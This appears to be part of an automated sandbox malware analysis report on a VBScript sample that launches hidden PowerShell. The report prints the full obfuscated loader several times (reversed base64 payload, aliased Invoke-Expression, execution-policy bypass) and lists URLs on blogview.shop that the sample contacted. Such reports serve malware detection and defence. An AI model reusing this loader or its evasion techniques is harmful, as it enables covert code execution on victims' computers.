NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: 9jJ4aVtoHG.vbsReversingLabs: Detection: 15%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
        Source: Binary string: n.pdb> source: powershell.exe, 00000002.00000002.2038799244.000002256A94E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dbpdbtem.pdbD source: powershell.exe, 00000002.00000002.2038799244.000002256A94E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2040555054.000002256C8AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: indows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbftq source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ystem\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_ source: powershell.exe, 00000002.00000002.2040555054.000002256C8AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2040555054.000002256C8AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbgement.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: blogview.shop
        Source: powershell.exe, 00000002.00000002.2036144414.0000022510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2036144414.00000225101B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2022092800.0000022500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2022092800.0000022500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000002.00000002.2022092800.0000022501A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.000002250199A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blogview.shop
        Source: powershell.exe, 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blogview.shop/api/values/
        Source: powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blogview.shop/api/values/86718771597555964672/refresh6/
        Source: powershell.exe, 00000002.00000002.2022092800.000002250199A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blogview.shop/api/values/86718771597555964672/refresh6/0213598674.txt
        Source: powershell.exe, 00000002.00000002.2022092800.000002250165A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blogview.shop/api/values/86718771597555964672/refresh6/X
        Source: powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blogview.shop/api/values/refresh6
        Source: powershell.exe, 00000002.00000002.2022092800.000002250165A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blogview.shop/api/values/refresh6X
        Source: powershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2022092800.0000022500F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2036144414.0000022510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2036144414.00000225101B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

        System Summary

        barindex
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;Jump to behavior
        Source: 9jJ4aVtoHG.vbsInitial sample: Strings found which are bigger than 50
        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@4/4@1/0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5g10b5x.hjp.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 9jJ4aVtoHG.vbsReversingLabs: Detection: 15%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: n.pdb> source: powershell.exe, 00000002.00000002.2038799244.000002256A94E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dbpdbtem.pdbD source: powershell.exe, 00000002.00000002.2038799244.000002256A94E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2040555054.000002256C8AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: indows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbftq source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ystem\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_ source: powershell.exe, 00000002.00000002.2040555054.000002256C8AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2040555054.000002256C8AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbgement.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2041853691.000002256CAF0000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell.exe -executionpolicy bypass -w hidden -noprofile -c $best64code", "0", "false");
        Found suspicious powershell code related to unpacking or dynamic code loading
